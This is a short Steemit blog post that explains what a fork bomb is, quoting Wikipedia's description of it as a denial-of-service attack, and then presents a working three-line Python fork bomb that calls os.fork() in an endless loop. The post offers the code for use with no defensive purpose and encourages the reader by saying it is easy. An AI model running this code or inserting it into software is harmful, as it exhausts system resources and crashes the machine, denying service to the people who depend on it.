Making A FORK bomb in python

in #steemit4 years ago

what is a fork bomb you might ask, well in computing "a fork bomb (also called rabbit virus or wabbit[1]) is a denial-of-service attack wherein a process continually replicates itself to deplete available system resources, slowing down or crashing the system due to resource starvation." wikipedia forkbomb

implementing this in python is much easier than you think:

import os
while True:
    os.fork()

check my repo

Coin Marketplace

STEEM 0.30
TRX 0.12
JST 0.033
BTC 64386.10
ETH 3142.17
USDT 1.00
SBD 3.98